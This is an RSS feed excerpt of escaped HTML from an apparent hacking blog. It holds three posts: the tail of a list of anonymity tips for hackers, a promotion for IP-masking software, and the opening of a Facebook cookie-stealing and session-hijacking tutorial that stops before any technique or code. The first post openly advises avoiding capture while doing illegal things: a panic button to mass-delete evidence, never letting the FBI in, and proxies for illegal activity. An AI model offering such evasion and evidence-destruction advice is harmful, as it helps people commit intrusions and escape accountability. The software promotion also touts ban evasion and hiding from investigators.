&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Password tip:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Dont use same password twice for maximum security&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Of course:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never hack from the same computer twice if possible&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Hide your Ip:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Hide your Ip address to avoid your chances of being traced,i have made a post on&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2010/02/hide-your-ip-address.html" style="border: none; color: #666666; text-decoration: none;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;Hide your IP address&lt;/span&gt;&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Use Firewall:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Always use a Good firewall such as zonealram&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Change your Ip:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Change your Ip address daily if possible,I have wrote an article on&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;a href="http://rafayhackingarticles.blogspot.com/2009/09/change-my-ipaddress.html" style="border: none; color: #666666; text-decoration: none;"&gt;How to change your Ip address&lt;/a&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Use fake information while signing up:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Dont enter your personal information eg your address,your number etc while&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Using social networking sites like orkut,Facebook etc&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Most importantly:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Always have a panic button that mass deletes your questionable content&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;OF course:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Never let the FBI in period.&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;b style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Yet again:&lt;/b&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;Always use a Proxy when doing anything remotely illegal&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;You must say to yourself that you do not follow one of these rules your chances of getting caught are high,This is why the most hackers are caught they forget to hide their identity,hope you liked the post.If you think that this article is worth kindly pass the comments&lt;/span&gt;&lt;br /&gt;
&lt;div dir="ltr" style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;" trbidi="on"&gt;
&lt;/div&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;br /&gt;&lt;/span&gt;
&lt;br /&gt;
&lt;div&gt;
&lt;span style="background-color: white; color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/div&gt;
&lt;/div&gt;
</description><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">0</thr:total></item><item><title>Hide your IP address</title><link>https://snacksofhacks.blogspot.com/2013/01/hide-your-ip-address.html</link><category>HaCkinG</category><category>TeCh</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 20:03:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-6713790565494157330</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;div class="separator" style="clear: both; text-align: center;"&gt;
&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-uIivrAAPM_Ur2nJcqnxJHaPSm-GS1LD7_HLvbvMhNbP7sW_E4Q9YRnEMDjIPwJD8rUzjrbLOSAP8ONNA9o87fPdWZPUnjyAaC2nSfO9JJR8cj6t2990O3pe4IBKQNOMu72_i5sfjfKo/s1600/Hide-IP-Address-300x168.png" imageanchor="1" style="clear: right; float: right; margin-bottom: 1em; margin-left: 1em;"&gt;&lt;img border="0" data-original-height="168" data-original-width="300" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-uIivrAAPM_Ur2nJcqnxJHaPSm-GS1LD7_HLvbvMhNbP7sW_E4Q9YRnEMDjIPwJD8rUzjrbLOSAP8ONNA9o87fPdWZPUnjyAaC2nSfO9JJR8cj6t2990O3pe4IBKQNOMu72_i5sfjfKo/s1600/Hide-IP-Address-300x168.png" /&gt;&lt;/a&gt;&lt;/div&gt;
&lt;h2 style="text-align: left;"&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span style="font-size: large;"&gt;Y&lt;/span&gt;&lt;span class="Apple-style-span" style="font-size: small; font-weight: normal;"&gt;our IP is exposed when ever you visit a website,when your IP gets exposed it becomes easy to trace you&amp;nbsp;and find out your personal information,Hackers can use your IP to gain access to your personal files and&amp;nbsp;documents and even can get into your pay pal, alert etc accounts,&lt;/span&gt;&lt;/span&gt;&lt;span style="font-family: verdana; font-size: small; font-weight: normal; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;Hide the IP&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;span class="Apple-style-span" style="color: #333333; font-family: &amp;quot;verdana&amp;quot; , sans-serif; font-size: 12px; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&lt;span style="font-size: small;"&gt;&lt;span style="font-weight: normal; line-height: 19.1875px;"&gt;&amp;nbsp;is a Software which masks your IP&amp;nbsp;with one click and you can surf web anonymously,on the other hand Hackers can use this software to hide&amp;nbsp;their identity and not get caught,its beneficial for all and i recommend that every&amp;nbsp;PC&amp;nbsp;should have this software installed.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h2&gt;
&lt;div style="font-family: verdana; line-height: 19.1875px; margin: 0px;"&gt;
&lt;span class="Apple-style-span" style="background-color: white; line-height: 24px;"&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;Hide the IP&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&amp;nbsp;to be the best one.&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="background-color: white; line-height: 24px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;It’s&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;ease of use&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;reliability&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;wide range of options&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;,&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;speed&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&amp;nbsp;and&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;un matchable price&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&amp;nbsp;were on top when compared to that of the remaining IP Hising softwares on the market.&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: verdana; line-height: 19.1875px; margin: 0px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 24px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: verdana; line-height: 19.1875px; margin: 0px;"&gt;
&lt;span class="Apple-style-span" style="line-height: 24px;"&gt;&lt;span class="Apple-style-span" style="line-height: normal;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;span style="background-color: white;"&gt;&lt;span style="background-color: #f3f3f3;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style="font-family: verdana; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;h3 style="border-bottom: 2px solid rgb(164, 111, 56); font-family: arial; font-weight: normal; margin: 0px 0px 3px; padding: 0px;"&gt;
&lt;span style="background-color: white; font-size: small;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;Key Features of&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;span style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;Hide the IP:&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;b style="font-family: verdana; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;Hide IP Address »&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&amp;nbsp;Single click to completely hide your Online Identity. Others will see a fake IP address masking your real IP, thus, protecting your privacy.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;b style="font-family: verdana; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;Select Your Physical IP Location »&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;You decide which country will be indicated as your origin by simply choosing from a country list. We have hundreds, hourly updated, IP addresses available for use.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;b style="font-family: verdana; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;Anonymous Web Surfing »&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;b&gt;&lt;/b&gt;You are protected from hackers who will be tricked by your fake IP instead of your real. They will never be able to find any information about you by tracing the fake IP.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;Send Anonymous E-mails » Hide your IP in E-mail headers. Be protected while sending emails from Yahoo!, Hotmail, GMail. Upgrading to Platinum Service add-on will protect you in Outlook!&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;b style="font-family: verdana; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;Bypass Website Country Restrictions »&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;&lt;b&gt;&lt;/b&gt;Surf websites which are restricted for your country. Surf in forums on which you were banned.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="background-color: #f3f3f3; font-size: xx-small;"&gt;&lt;br /&gt;&lt;/span&gt;&lt;/span&gt;
&lt;span style="background-color: #f3f3f3;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif; line-height: 19.1875px;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&lt;/span&gt;&lt;/span&gt;&lt;br style="font-family: verdana; line-height: 19.1875px;" /&gt;&lt;/span&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;div style="font-family: verdana; line-height: 19.1875px; margin: 0px 0px 15px; padding: 0px;"&gt;
&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white;"&gt;Supports Internet Explorer, Firefox, Google Chrome, Safari, Opera.&lt;/span&gt;&lt;/span&gt;&lt;/div&gt;
&lt;div style="font-family: verdana; line-height: 19.1875px; margin: 0px 0px 15px; padding: 0px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;So what are you waiting for?&amp;nbsp;&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;a href="http://www.hide-the-ip.com/203-download.shtml" style="border: none; text-decoration: none;"&gt;&lt;span class="Apple-style-span" style="color: #3d85c6;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;Download the free trial&lt;/span&gt;&lt;/span&gt;&lt;/span&gt;&lt;/a&gt;&lt;/strong&gt;&lt;strong style="margin: 0px; padding: 0px;"&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="font-size: xx-small;"&gt;&amp;nbsp;and test Hide the IP on your computer now! For more information on Hide the IP visit the following link.&lt;/span&gt;&lt;/span&gt;&lt;/strong&gt;&lt;/span&gt;&lt;/div&gt;
&lt;h3 style="border-bottom: 2px solid rgb(164, 111, 56); font-family: arial; font-weight: normal; margin: 0px 0px 3px; padding: 0px;"&gt;
&lt;a href="http://www.hide-the-ip.com/203-hide-my-ip.shtml" style="border: none; text-decoration: none;"&gt;&lt;span class="Apple-style-span" style="color: #cc0000;"&gt;&lt;b&gt;&lt;span class="Apple-style-span" style="font-family: &amp;quot;verdana&amp;quot; , sans-serif;"&gt;&lt;span class="Apple-style-span" style="background-color: white; color: black; font-size: small;"&gt;Hide the IP&lt;/span&gt;&lt;/span&gt;&lt;/b&gt;&lt;/span&gt;&lt;/a&gt;&lt;/h3&gt;
&lt;/div&gt;
</description><media:thumbnail xmlns:media="http://search.yahoo.com/mrss/" height="72" url="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-uIivrAAPM_Ur2nJcqnxJHaPSm-GS1LD7_HLvbvMhNbP7sW_E4Q9YRnEMDjIPwJD8rUzjrbLOSAP8ONNA9o87fPdWZPUnjyAaC2nSfO9JJR8cj6t2990O3pe4IBKQNOMu72_i5sfjfKo/s72-c/Hide-IP-Address-300x168.png" width="72"/><thr:total xmlns:thr="http://purl.org/syndication/thread/1.0">2</thr:total></item><item><title>Facebook cookie stealing and session Hijacking</title><link>https://snacksofhacks.blogspot.com/2013/01/facebook-cookie-stealing-and-session_5784.html</link><category>HaCkinG</category><author>noreply@blogger.com (Anonymous)</author><pubDate>Wed, 9 Jan 2013 17:35:00 +0530</pubDate><guid isPermaLink="false">tag:blogger.com,1999:blog-3441350317927969357.post-8847419691671357474</guid><description>&lt;div dir="ltr" style="text-align: left;" trbidi="on"&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;/span&gt;&lt;br /&gt;
&lt;h3 class="post-title entry-title" style="border-bottom-color: rgb(164, 111, 56); border-bottom-style: solid; border-bottom-width: 2px; font-family: 'Black Ops One', Arial, sans-serif; font-size: 25px; font-weight: normal; line-height: 1.1em; margin-bottom: 7px; padding: 0px 0px 5px 5px;"&gt;
&lt;span style="background-color: white;"&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/07/facebook-cookie-stealing-and-session.html" style="border: none; text-decoration: none;"&gt;&lt;span style="color: black;"&gt;Facebook Cookie Stealing And Session Hijacking&lt;/span&gt;&lt;/a&gt;&lt;a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6zT4dPEBfgsxYCjiZricjnZDqCQqxBS-jM2SW2yzO6aPNpS3ZBA0K8wCwwH89uVO3zEWYy-WAvuu1lN_2ISvjsWK6W8WgFjrMXwWObOmPkr_aVdKX18MqA_rJxLsQ3A4Jhsza0nbiuo0/s1600/How-to-hack-Facebook.jpg" imageanchor="1" style="border: none; color: #666666; font-family: Verdana; font-size: 12px; line-height: 19.1875px; margin-left: 1em; margin-right: 1em; text-align: center; text-decoration: none;"&gt;&lt;img border="0" height="200" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6zT4dPEBfgsxYCjiZricjnZDqCQqxBS-jM2SW2yzO6aPNpS3ZBA0K8wCwwH89uVO3zEWYy-WAvuu1lN_2ISvjsWK6W8WgFjrMXwWObOmPkr_aVdKX18MqA_rJxLsQ3A4Jhsza0nbiuo0/s320/How-to-hack-Facebook.jpg" style="border-width: 0px; padding: 10px;" width="320" /&gt;&lt;/a&gt;&lt;/span&gt;&lt;/h3&gt;
&lt;span style="background-color: white;"&gt;&lt;br /&gt;
&lt;span style="color: #333333; font-family: Verdana; line-height: 19.1875px;"&gt;&lt;span style="font-size: x-large;"&gt;T&lt;/span&gt;&lt;/span&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;hree days ago I finished the series on&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/07/gmail-cookie-stealing-and-session.html" style="border: none; color: #666666; text-decoration: none;"&gt;Gmail Session Hijacking and Cookie Stealing&amp;nbsp;&lt;/a&gt;&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;, due to a tremendous response of readers I planned to write a post on Facebook cookie stealing and Session hijacking. Facebook session hijacking can also be accomplished via a very popular tool called Firesheep&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;(On a Wifi Network Only)&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;, which I won't be explaining here because I have already written it before in my post&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;a href="http://www.rafayhackingarticles.net/2010/11/firesheep-makes-facebook-hacking-easy.html" style="border: none; color: #666666; text-decoration: none;"&gt;Facebook Hacking Made Easy With Firesheep&lt;/a&gt;&lt;/b&gt;&lt;/span&gt;&lt;br /&gt;
&lt;span style="background-color: white;"&gt;&lt;a href="http://www.blogger.com/blogger.g?blogID=3441350317927969357" name="more" style="color: #a46f38; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&lt;/a&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;In this tutorial I will explain you how an attacker can capture your authentication cookies on a local area network and use them to&amp;nbsp;&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;hack your facebook account&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;, &amp;nbsp;Before reading this tutorial I would recommend you to &amp;nbsp;part1, part2 and part 3 of my&lt;/span&gt;&lt;b style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;&amp;nbsp;Gmail Session Hijacking and Cookie stealing series&lt;/b&gt;&lt;span style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px;"&gt;, So you could have better understanding of what I am doing here.&lt;/span&gt;&lt;/span&gt;&lt;br /&gt;
&lt;ul style="color: #333333; font-family: Verdana; font-size: 12px; line-height: 19.1875px; list-style: none;"&gt;
&lt;li style="background-attachment: scroll; background-image: url(https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjVpXM_fw9sGABT2H4WInNdogZVuhyphenhyphenHxwyW3cSFQnVXd09ujqm20JdW3W9Z7-XwVQFo75B1Auou3SlCHY8pZS6_wyZ6EeTtks5pOVSk63V4Yqy_fJJj7_1HdjMTMUdo13RBMbj80wWHH0wE/s320/143.gif); background-position: 0px 4px; background-repeat: no-repeat no-repeat; line-height: 1.4em; margin: 0.3em 0px; padding: 0px 0px 0.8em 20px;"&gt;&lt;b&gt;&lt;a href="http://www.rafayhackingarticles.net/2011/06/gmail-cookie-stealing-and-session.html" style="background-color: white; border: none; color: #666666; text-decoration: none;"&gt;Gmail Cookie Stealing And Session Hijacking Part 1&lt;/a&gt;&lt;/b&gt;&lt;/li&gt;
